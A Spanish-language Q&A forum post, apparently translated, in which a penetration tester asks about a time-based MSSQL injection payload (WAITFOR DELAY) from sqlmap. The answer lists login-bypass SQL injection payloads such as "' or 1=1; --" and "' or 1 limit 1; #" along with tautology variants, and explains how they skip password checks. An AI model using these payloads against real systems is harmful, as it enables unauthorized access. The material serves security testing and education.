Es bueno tenerte leyendo esto, mis preguntas son:
(El título)
Si es posible, ¿podría darme una idea de cómo haría esto para MSSQL porque no soy bueno en eso? Estoy tratando de demostrar el daño que esto podría hacer a un cliente. Se basa en el tiempo como:
NAME=pentest';WAITFOR DELAY '0:0:5'--&PASS=mypass
^ Carga útil como se indica en sqlmap
Gracias !!!
SÍ, según la carga útil proporcionada por el mapa sql.
Se puede utilizar la siguiente carga útil: -
' or 1=1; --
' or 1; #
donde '#' y '-' tienen el mismo propósito de comentar el lado derecho (RHS) de la consulta.
' or 1 limit 1; #
' or 1 limit 1; --
el límite 1 garantizará que solo se recupere un registro en el conjunto de datos, por lo que se proporciona un crédito válido para el mecanismo de inicio de sesión.
Algunas cargas útiles más son: -
OR 'SQLi' = 'SQL'+'i'
OR 'SQLi' > 'S'
or 20 > 1
OR 2 between 3 and 1
OR 'SQLi' = N'SQLi'
1 and 1 = 1
1 || 1 = 1
1 && 1 = 1
que se puede utilizar junto con los ejemplos anteriores.
cita: enlace
Lea otras preguntas en las etiquetas authentication sql-injection sqlmap